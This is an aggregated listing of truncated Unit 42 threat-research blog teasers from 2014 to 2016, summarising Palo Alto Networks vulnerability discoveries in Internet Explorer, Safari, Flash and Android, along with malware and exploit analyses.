Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Discover Critical Safari 9.1 Vulnerability
Ryan Olson
Published: July 27, 2016
Threat Research
Vulnerabilities
Apple
CVE-2016-4589
IPad 2
IPhone 4S
IPod Touch
Safari
WebKit
Palo Alto Networks researchers were recently credited with the discovery of an Apple product vulnerability.
Researchers Tongbo Luo and Bo Qu discovered a WebKit vulnerability (CVE-2016-4589) affecting Safari in Apple iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later, and Apple TV (4th generation).
Apple addressed both findings in a recent security updates ( HT206902 and HT206905 ) and are resolved in iOS 9.3.3 and tvOS 9.2.2. Palo Alto Networks also released IPS signatures covering these
Unit42
Palo Alto Networks Researchers Discover Two Critical Internet Explorer Vulnerabilities
blogs_unit42·2016-07-13·CVSS 6.5
[MEDIUM] Palo Alto Networks Researchers Discover Two Critical Internet Explorer Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Discover Two Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: July 13, 2016
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researchers discovered two new critical Internet Explorer (IE) vulnerabilities affecting IE versions 9, 10, and 11. Both are included in Microsoft’s July 2016 Security Bulletin, and documented in Microsoft Security Bulletin MS16-084 .
In our continued commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclosure of new vulnera
Unit42
Recent MNKit Exploit Activity Reveals Some Common Threads
blogs_unit42·2016-06-30·CVSS 8.8
CVE-2012-0158 [HIGH] Recent MNKit Exploit Activity Reveals Some Common Threads
Threat Research Center
Threat Research
Malware
## Recent MNKit Exploit Activity Reveals Some Common Threads
Anthony Kasza
Published: June 30, 2016
Malware
Threat Research
Vulnerabilities
CVE-2012-0158
LURKo Ghost
MNKit
NetTraveler
Payload
Saker
Unit 42 recently identified a variant of MNKit-weaponized documents being used to deliver LURK0 Gh0st, NetTraveler, and Saker payloads. The documents were delivered to targets involved with universities, NGOs, and political/human rights groups concerning Islam and South Asia. Reuse of this MNKit variant, sender email addresses, email subject lines, attachment filenames, command and control domains, XOR keys, and targeted recipients show a connection between the different payload families delivered.
MNKit is the name given to a buil
Unit42
Palo Alto Networks Researchers Uncover Critical Apple Product Vulnerabilities
blogs_unit42·2016-06-02·CVSS 8.8
CVE-2016-1855 [HIGH] Palo Alto Networks Researchers Uncover Critical Apple Product Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Uncover Critical Apple Product Vulnerabilities
Ryan Olson
Published: June 2, 2016
Threat Research
Vulnerabilities
Apple
Apple TV
IPad 2
IPhone 4S
IPod Touch
Palo Alto Networks researchers were recently credited with discovery of two new Apple product vulnerabilities.
Researchers Tongbo Luo and Bo Qu discovered a webkit vulnerability (CVE-2016-1855) affecting Safari in OS X Mavericks v10.9.5, OS X Yosemite v10.10.5 and OS X El Capitan v10.10.5.
Tongbo and Bo also identified an OpenGL vulnerability (CVE-2016-1847) affecting Apple TV (fourth generation and later), iPhone 4S (and later versions), iPod Touch (fifth generation and later), and iPad 2 (and later versions).
Apple addressed bot
Unit42
Palo Alto Networks Researchers Discover Critical IE Vulnerabilities
blogs_unit42·2016-03-25·CVSS 6.5
[MEDIUM] Palo Alto Networks Researchers Discover Critical IE Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Discover Critical IE Vulnerabilities
Ryan Olson
Published: March 25, 2016
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Palo Alto Networks researchers Tongbo Luo and Hui Gao were credited with the discoveries of new critical Microsoft vulnerabilities affecting Internet Explorer (IE) versions 7, 8, 9, 10 and 11 on affected Windows clients. These vulnerabilities are documented in Microsoft Security Bulletin MS15-106 and MS15-112 .
In our continued commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclosure of
Unit42
AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device
blogs_unit42·2016-03-16
AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device
Threat Research Center
Threat Research
Vulnerabilities
## AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device
Claud Xiao
Published: March 16, 2016
Threat Research
Vulnerabilities
AceDeceiver
FairPlay
OS X
Trojan
ZergHelper
We’ve discovered a new family of iOS malware that successfully infected non-jailbroken devices we’ve named “AceDeceiver”.
What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel at
Unit42
Palo Alto Networks Researcher Discovers Critical IE Vulnerability
blogs_unit42·2016-03-09·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Discovers Critical IE Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Critical IE Vulnerability
Ryan Olson
Published: March 9, 2016
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Hui Gao was credited with the discovery of a new critical Microsoft vulnerability affecting Internet Explorer (IE) versions 9, 10 and 11. This vulnerability is covered in Microsoft’s March 2016 Security Bulletin and documented in Microsoft Security Bulletin MS16-023 .
In our continued commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible d
Unit42
Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Adobe Flash
blogs_unit42·2016-01-05·CVSS 10.0
CVE-2015-8443 [CRITICAL] Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Adobe Flash
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Adobe Flash
Ryan Olson
Published: January 5, 2016
Threat Research
Vulnerabilities
Adobe
Adobe Flash Player
Palo Alto Networks was recently credited with discovery of two new vulnerabilities affecting Adobe Flash Player.
Researcher Hui Gao discovered critical vulnerabilities CVE-2015-8443 and CVE-2015-8444. Descriptions of each, as well as details on affected versions and products, are included in an Adobe Security Bulletin dated December 8, 2015 . Adobe has released security updates for Adobe Flash Player.
Palo Alto Networks is an active contributor to vulnerability research, including regular discoveries of critical vulnerabilities affecting Adobe Fla
Unit42
Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Microsoft Edge
blogs_unit42·2015-12-10·CVSS 6.5
[MEDIUM] Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Microsoft Edge
## Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Microsoft Edge
Ryan Olson
Published: December 10, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft edge
Microsoft Security Bulletin
Palo Alto Networks researchers Bo Qu and Hui Gao were credited with the discovery of three new critical Microsoft vulnerabilities affecting Internet Explorer (IE) versions 7, 8, 9, 10 and 11 and Microsoft Edge. These vulnerabilities are covered in Microsoft’s December 2015 Security Bulletin and documented in Microsoft Security Bulletins MS15-125 and MS15-124 .
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (
Unit42
Palo Alto Networks Researchers Discover High Severity Vulnerability Impacting Apple’s Major Products
blogs_unit42·2015-12-09·CVSS 6.8
CVE-2015-7066 [MEDIUM] Palo Alto Networks Researchers Discover High Severity Vulnerability Impacting Apple’s Major Products
## Palo Alto Networks Researchers Discover High Severity Vulnerability Impacting Apple’s Major Products
Ryan Olson
Published: December 9, 2015
Threat Research
Vulnerabilities
Apple
Apple TV
Apple Watch
IPad
IPhone
IPod
OS X
Palo Alto Networks researchers Tongbo Luo and Bo Qu are credited with discovering a new vulnerability (CVE-2015-7066) in OpenGL and Webkit that impacts all of Apple’s major products, including:
iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 and v10.11.1
Apple TV (4th generation)
CVE-2015-7066 is a memory corruption issue that can lead to remote code execution when a user views a
Unit42
Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Internet Explorer and Microsoft Edge
blogs_unit42·2015-11-11·CVSS 9.8
[CRITICAL] Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Internet Explorer and Microsoft Edge
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Critical Vulnerabilities in Internet Explorer and Microsoft Edge
Ryan Olson
Published: November 11, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft edge
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu was credited with discovery of six new critical Microsoft vulnerabilities affecting Internet Explorer (IE) versions 7, 8, 9, 10 and 11 and Microsoft Edge. These vulnerabilities are covered in Microsoft’s November 2015 Security Bulletin and documented in Microsoft Security Bulletins MS15-112 and MS15-113 .
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the
Unit42
Palo Alto Networks Researcher Discovers Critical IE Vulnerability
blogs_unit42·2015-10-27·CVSS 9.3
CVE-2015-2548 [CRITICAL] Palo Alto Networks Researcher Discovers Critical IE Vulnerability
## Palo Alto Networks Researcher Discovers Critical IE Vulnerability
Ryan Olson
Published: October 27, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Hui Gao was credited with discovery of a new critical Internet Explorer (IE) vulnerability affecting IE versions 6, 7, 8, 9, 10 and 11. CVE-2015-2548 is included in Microsoft's October 2015 Security Bulletin and documented in Microsoft Security Bulletin MS15-109 .
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclosure of new vulnerabilities and creation of protection
Unit42
Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Adobe Shockwave Player
blogs_unit42·2015-09-09·CVSS 9.9
[CRITICAL] Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Adobe Shockwave Player
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researchers Discover Critical Vulnerabilities in Internet Explorer and Adobe Shockwave Player
Ryan Olson
Published: September 9, 2015
Threat Research
Vulnerabilities
Adobe
Adobe Shockwave Player
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researchers have been credited with discovery of new vulnerabilities affecting Adobe Shockwave Player and Microsoft Internet Explorer.
Palo Alto Networks researcher Tongbo Luo discovered a critical vulnerability in Adobe Shockwave Player affecting Shockwave versions 12.1.9.160 and earlier for Windows. The vulnerability and upgrade instructions are detailed by Adobe in a Security Bulletin dated September 8, 2015 .
Palo Alto Networks
Unit42
UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
blogs_unit42·2015-07-27·CVSS 9.8
CVE-2015-3113 [CRITICAL] UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
## UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload
Robert Falcone
Richard Wartell
Published: July 27, 2015
Threat Research
Vulnerabilities
ActionScript
Adobe Flash
APT3
Internet Explorer
Operation Clandestine Wolf
Pirpi
Shellcode
Steganography
UPS
Zero-days
A June 23 FireEye blog post titled “Operation Clandestine Wolf” discussed a cyber espionage group, known as APT3, that had been exploiting a zero-day vulnerability in Adobe Flash. Unit 42 also tracks the APT3 group using the name UPS, which is an intrusion set with Chinese origins that is known for having early access to zero-day vulnerabilities and delivering a backdoor called Pirpi.
The UPS group has exploited several zero-day vulnerabilities, most recently using the zero-days released in th
Unit42
Palo Alto Networks Researcher Discovers Two Critical Internet Explorer Vulnerabilities
blogs_unit42·2015-07-16·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Discovers Two Critical Internet Explorer Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers Two Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: July 16, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered two new critical Internet Explorer (IE) vulnerabilities affecting IE versions 6, 7, 8, 9, 10, and 11. Both are included in Microsoft’s July 2015 Security Bulletin , and documented in Microsoft Security Bulletins MS15-065 and MS15-066 .
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, respons
Unit42
Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2015-06-09·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: June 9, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered three new critical Internet Explorer (IE) vulnerabilities affecting IE versions 6, 7, 8, 9, 10 and 11. All three are included in Microsoft’s June 2015 Security Bulletin , and documented in Microsoft Security Bulletin MS15-056 .
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclo
Unit42
Understanding Flash Exploitation and the Alleged CVE-2015-0359 Exploit
blogs_unit42·2015-06-01·CVSS 9.8
CVE-2015-0359 [CRITICAL] Understanding Flash Exploitation and the Alleged CVE-2015-0359 Exploit
Threat Research Center
Threat Research
Vulnerabilities
## Understanding Flash Exploitation and the Alleged CVE-2015-0359 Exploit
Palo Alto Networks
Published: June 1, 2015
Threat Research
Vulnerabilities
Adobe Flash Player
Angler Exploit
ByteArray
ByteArrayObject
Flash
What follows is a detailed analysis of the root cause of a vulnerability we call CVE-2015-X, as well as a step-by-step explanation of how to trigger it. For more on Flash vulnerabilities, we also invite you to read " The Latest UAF Vulnerabilities in Exploit Kits ," published May 28 by Tao Yan.
Not too long ago we came across a sample from the Angler Exploit kit (MD5: 049ff69bc23f36a78d86bbf1356c2f63c), which allegedly exploits CVE-2015-0359 . The obfuscated SWF contains an encoded SWF (MD5: d45808cfa6f3cbfb3
Unit42
The Latest Flash UAF Vulnerabilities in Exploit Kits
blogs_unit42·2015-05-28
The Latest Flash UAF Vulnerabilities in Exploit Kits
## The Latest Flash UAF Vulnerabilities in Exploit Kits
Tao Yan
Published: May 28, 2015
Threat Research
Vulnerabilities
Adobe Flash
ByteArray
Flash UAF
## Introduction
Recently, several popular exploit kits, including Angler, Flash EK, SweetOrange, Fiesta andNeutrino[1], have included several use-after-free (UAF) vulnerabilities in Adobe Flash to exploit victims’ browsers. Previously, these exploit kits typically used out-of-bounds access (OBA) vulnerabilities in Adobe Flash, as these types of vulnerabilities can be exploited universally and stably [2], and require less effort to exploit compared to UAF vulnerabilities. In order to detect these newly added UAF vulnerabilities, we analyzed the code found in the exploit kits to determine which vulnerabilities are present and how
Unit42
Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2015-05-12·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Researcher Discovers 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: May 12, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered three new critical Internet Explorer (IE) vulnerabilities affecting IE versions 8, 9, 10 and 11. All three are included in Microsoft’s May 2015 Security Bulletin , and documented in Microsoft Security Bulletin MS15-043 .
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP) program, which ensures the timely, responsible disclosure of new vulnerabilities and creation of protections from secur
Unit42
Android Installer Hijacking Vulnerability Could Expose Android Users to Malware
blogs_unit42·2015-03-24
Android Installer Hijacking Vulnerability Could Expose Android Users to Malware
Threat Research Center
Threat Research
Vulnerabilities
## Android Installer Hijacking Vulnerability Could Expose Android Users to Malware
Zhi Xu
Published: March 24, 2015
Malware
Threat Research
Vulnerabilities
Android
Android Installer Hijacking
Google
Mobility
## Executive Summary
We discovered a widespread vulnerability in Google’s Android OS we are calling “Android Installer Hijacking,” estimated to impact 49.5 percent of all current Android users. In detail:
Android Installer Hijacking allows an attacker to modify or replace a seemingly benign Android app with malware, without user knowledge. This only affects applications downloaded from third-party app stores.
The malicious application can gain full access to a compromised device, including usernames, passwords,
Unit42
Palo Alto Networks Researcher Identifies Critical Internet Explorer Vulnerability
blogs_unit42·2015-03-10·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Identifies Critical Internet Explorer Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Identifies Critical Internet Explorer Vulnerability
Ryan Olson
Published: March 10, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered a new critical Internet Explorer (IE) vulnerability affecting IE versions 8, 9, 10 and 11. This is included in Microsoft’s March 2015 Security Bulletin MS15-018 and MS15-019 , and documented in Microsoft Security Bulletin MS15-MAR .
As part of our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP), which ensures the timely, responsible di
Unit42
Palo Alto Networks Researcher Identifies 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2015-02-10·CVSS 6.5
[MEDIUM] Palo Alto Networks Researcher Identifies 3 Critical Internet Explorer Vulnerabilities
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Researcher Identifies 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: February 10, 2015
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered three new critical Internet Explorer (IE) vulnerabilities affecting IE versions 9, 10 and 11. All three are included in Microsoft's February 2015 Security Bulletin MS15-009 and documented in Microsoft Security Bulletin MS15-FEB .
As part of our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP), which ensures the timely, responsibl
Unit42
Watch Our Researchers Cover Predicting Malicious Domains at VB2014
blogs_unit42·2015-02-09·CVSS 6.5
[MEDIUM] Watch Our Researchers Cover Predicting Malicious Domains at VB2014
## Watch Our Researchers Cover Predicting Malicious Domains at VB2014
Palo Alto Networks
Published: February 9, 2015
Threat Research
Vulnerabilities
VB2014
Virus Bulletin International Conference
Malicious domains are commonly used by cyberattackers for command and control communication, hosting malware and phishing attacks. Palo Alto Networks researchers Wei Xu, Kyle Sanders and Yanxin Zhang recently explored ways to predict malicious domains so they can be added to blacklists before they go live . To hear how they went about this, and to see the results they achieved, take a look at this video from their paper presentation at VB2014 :
## Tags
VB2014
Virus Bulletin International Conference
## VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability
Unit42
Google Chrome Exploitation – A Case Study
blogs_unit42·2014-12-15
Google Chrome Exploitation – A Case Study
## Google Chrome Exploitation – A Case Study
Palo Alto Networks
Published: December 14, 2014
Threat Research
Vulnerabilities
Exploitation
Google Chrome
In this write-up, we will present several techniques used in exploiting a vulnerability in Google Chrome, and the various difficulties presented by its security mechanisms and considerations. We also offer some reflections regarding how some of the techniques used were made irrelevant by mitigations introduced since.
The exploit was developed to exploit a bug in Chrome 33, a winning submission to Pwn2Own 2014 by geohot, which later also awarded him the Best Client-Side Bug pwnie award.
## The Bug
The vulnerability existed in Chrome's implementation of ArrayBuffers, and is described in some detail in this issue page in the Chrom
Unit42
DTLS Vulnerabilities in CVE-2014-6321
blogs_unit42·2014-12-10·CVSS 10.0
CVE-2014-6321 [CRITICAL] DTLS Vulnerabilities in CVE-2014-6321
## DTLS Vulnerabilities in CVE-2014-6321
Jin Chen
Shengming Xu
Published: December 10, 2014
Threat Research
Vulnerabilities
CVE-2014-6321
Datagram Transport Layer Security
DTLS
Microsoft Remote Desktop Protocol
Microsoft Security Bulletin
Microsoft Windows
MS14-066
Remote Desktop Gateway
Schannel
Microsoft recently released a patch for a critical vulnerability in Microsoft Secure Channel (aka Schannel). This vulnerability is being referred to as MS14-066 . The patch addressing CVE-2014-6321 fixed many areas within schannel.dll, including at least two vulnerabilities related to the handling of the Datagram Transport Layer Security (DTLS) protocol.
DTLS is used by Microsoft Remote Desktop Protocol (RDP) to provide communications privacy for datagram protocols. The DTLS proto
Unit42
Code to Trigger MS14-066 ECDSA Server BOF Vulnerability
blogs_unit42·2014-12-04
Code to Trigger MS14-066 ECDSA Server BOF Vulnerability
## Code to Trigger MS14-066 ECDSA Server BOF Vulnerability
IPS Team
Published: December 4, 2014
Threat Research
Vulnerabilities
BOF
Buffer Overflow
Microsoft Secure Channel
Microsoft Security Bulletin
MS14-066
OpenSSL
Schannel
Microsoft recently released a patch for a critical vulnerability in Microsoft Secure Channel (aka Schannel). This vulnerability is being referred to as MS14-066 .
A description of how to trigger the MS14-066 ECDSA Heap Buffer Overflow vulnerability was posted by BeyondTrust, which also explained the research method used in narrowing down where this vulnerability presented itself. Their article mentions leveraging the OpenSSL s_client to authenticate to an IIS server, and by patching the s3_cInt.c file to fuzz the particular code path they were able to t
Unit42
Addressing CVE-2014-6332 SWF Exploit
blogs_unit42·2014-11-26·CVSS 8.8
CVE-2014-6332 [HIGH] Addressing CVE-2014-6332 SWF Exploit
## Addressing CVE-2014-6332 SWF Exploit
Palo Alto Networks
Published: November 26, 2014
Threat Research
Vulnerabilities
EMET
Endpoint
Internet Explorer
Shellcode
Continuing a recent trend in which Internet Explorer vulnerabilities are exploited using Flash, samples of an SWF purportedly used in conjunction with CVE-2014-6332 have appeared in several places. The most famous examples of this trend are the exploits for CVE-2014-0322 and CVE-2014-1776 .
We have yet to encounter the SWF sample with its original exploit attached, but by looking at the SWF, it is clear that it is constructed to function with several forms of memory corruption, making the vulnerability itself less interesting. That is a great example of why our Advanced Endpoint Protection approach, which focuses on the
Unit42
Palo Alto Networks Identifies 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2014-11-11·CVSS 6.5
[MEDIUM] Palo Alto Networks Identifies 3 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Identifies 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: November 11, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered three new critical Internet Explorer (IE) vulnerabilities impacting IE versions 8, 9, 10 and 11. The discoveries include two IE Memory Corruption Vulnerability and an IE ASLR Bypass Vulnerability. All three are part of the November 2014 Security Bulletin and documented in Microsoft Security Bulletin MS14-065 .
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections Program (MAPP), which ensures the timely, respon
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
## Super Tuesday: A Patch Tuesday We Won’t Forget
Ryan Olson
Published: October 15, 2014
Threat Research
Vulnerabilities
BlackEnergy
ISight
Microsoft
Microsoft Security Bulletin
Patch Tuesday
PowerShell Empire
Sandworm
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities , Adobe issued updates for Flash and ColdFusion , and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
## Sandworm
The first to drop was the Sandworm Campaign , a report from iSight partners, which described attacks on European and American t
Unit42
Palo Alto Networks Identifies Critical Internet Explorer Vulnerability
blogs_unit42·2014-10-14·CVSS 6.5
[MEDIUM] Palo Alto Networks Identifies Critical Internet Explorer Vulnerability
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Identifies Critical Internet Explorer Vulnerability
Ryan Olson
Published: October 14, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researcher Bo Qu discovered a new critical Internet Explorer (IE) vulnerability impacting IE versions 6, 7, 8, 9 and 10. The vulnerability allows for full remote code execution using a memory corruption flaw. The vulnerability is documented in Microsoft Security Bulletin MS14-056 and is part of the October 2014 Security Bulletin .
In our continuing commitment to the security research community, these vulnerabilities were disclosed to Microsoft through our participation in the Microsoft Active Protections P
Unit42
Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
blogs_unit42·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
Threat Research Center
Threat Research
Vulnerabilities
## Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271
Ryan Olson
Published: September 25, 2014
Threat Research
Vulnerabilities
Apache
Bash
CVE-2014-6271
Linux
Mac OS X
MITRE
OpenSSH
PAN-OS
Panorama
Shellshock
Unix
Around 6:00 am PST on September 24, the details of a vulnerability in the widely used Bourne Again Shell (Bash) were disclosed by multiple Linux vendors. The vulnerability, assigned CVE-2014-6271 by Mitre, was originally discovered by Stephane Chazelas, a Unix and Linux network and telecom administrator and IT manager at UK robotics company SeeByte, Ltd.
While this vulnerability didn’t come with quite the fanfare or a catchy name like Heartbleed , the security commun
Unit42
Palo Alto Networks Identifies 15 Critical Internet Explorer Vulnerabilities
blogs_unit42·2014-09-09
Palo Alto Networks Identifies 15 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Identifies 15 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: September 9, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researchers discovered 15 new critical Internet Explorer (IE) vulnerabilities covering IE versions 6, 7, 8, 9, 10 and 11.
Each of these discoveries allows full remote code execution using memory corruption vulnerabilities in IE. They have been documented in Microsoft Security Bulletin MS14-052 and part of the September 2014 Security Bulletin . Palo Alto Networks researcher Bo Qu is credited with these 15 vulnerabilities.
Palo Alto Networks customers are protected from these vulnerabilities through our regular Vulnerability Protection updates, and we recomme
Unit42
Examining the CHS Breach and Heartbleed Exploitation
blogs_unit42·2014-08-20·CVSS 7.5
CVE-2014-0160 [HIGH] Examining the CHS Breach and Heartbleed Exploitation
## Examining the CHS Breach and Heartbleed Exploitation
Ryan Olson
Published: August 20, 2014
Malware
Threat Research
Vulnerabilities
Community Health Systems
CVE-2014-0160
Heartbleed
OpenSSL
TrustedSec
Yesterday, TrustedSec , a security consultancy based on Ohio, wrote that the recent breach at Community Health Systems (CHS) was the result of exploitation of the Heartbleed OpenSSL vulnerability (CVE-2014-0160). CHS’s 8-K filing on Monday did not reveal how the attackers got into their network, only that the records of approximately 4.5 million patients were stolen in attacks in between April and June of 2014. TrustedSec reports on how attackers were apparently able to glean user credentials from a certain device via the Heartbleed vulnerability and use them to log in via a VPN
Unit42
Insecure Internal Storage in Android
blogs_unit42·2014-08-19
Insecure Internal Storage in Android
## Insecure Internal Storage in Android
Claud Xiao
Published: August 18, 2014
Threat Research
Vulnerabilities
ADB
Android
HITCON
Vulnerability exploit
Today, Palo Alto Networks researcher Claud Xiao is delivering a presentation titled “Insecure Internal Storage in Android” at the Hacks in Taiwan Conference ( HITCON ).
Claud is discussing techniques for accessing private data in Android’s internal storage system using the Android Debug Bridge (ADB) backup/restore functionality. While over 85% of active Android devices are vulnerable to this attack, Android includes multiple levels of protection to prevent unauthorized data access. In today’s presentation, Claud will have demonstrated how an attacker could bypass all of those protections to gain access to usernames, passwords and
Unit42
Palo Alto Networks Discovers 3 Critical Internet Explorer Vulnerabilities
blogs_unit42·2014-08-16·CVSS 6.5
[MEDIUM] Palo Alto Networks Discovers 3 Critical Internet Explorer Vulnerabilities
## Palo Alto Networks Discovers 3 Critical Internet Explorer Vulnerabilities
Ryan Olson
Published: August 16, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Palo Alto Networks researchers discovered 3 new critical Internet Explorer (IE) vulnerabilities covering IE versions 8, 9, 10 and 11.
Each of these discoveries allows full remote code execution using a memory corruption vulnerability in IE. They have been documented in Microsoft Security Bulletin MS14-051 and part of the August 2014 Security Bulletin . Palo Alto Networks researcher Bo Qu is credited with all 3 vulnerabilities.
Palo Alto Networks customers are protected from these vulnerabilities through our regular Vulnerability Protection updates, and we recommend Internet Explo
Unit42
Palo Alto Networks Identifies 21 New Critical Vulnerabilities in Internet Explorer
blogs_unit42·2014-06-10·CVSS 9.3
[CRITICAL] Palo Alto Networks Identifies 21 New Critical Vulnerabilities in Internet Explorer
## Palo Alto Networks Identifies 21 New Critical Vulnerabilities in Internet Explorer
Ryan Olson
Published: June 10, 2014
Threat Research
Vulnerabilities
Internet Explorer
Microsoft
Microsoft Security Bulletin
Patch Tuesday
Today, Microsoft patched 59 Internet Explorer vulnerabilities, 21 of them discovered by Palo Alto Networks researchers. Palo Alto Networks is committed not only to detecting attacks, but preventing them as well.
Our internal research team discovered each of these 21 vulnerabilities and reported them to Microsoft so they could begin building and testing patches. Microsoft has already credited our team with 14 previous IE vulnerabilities in 2014, bringing our total for the year up to 35. We want to acknowledge Palo Alto Networks researchers Bo Qu, Hui Gao, Royc
Unit42
A Tale of 3 Vulnerabilities, CVE-2014-1776 Exploit Linked to Previous Attacks
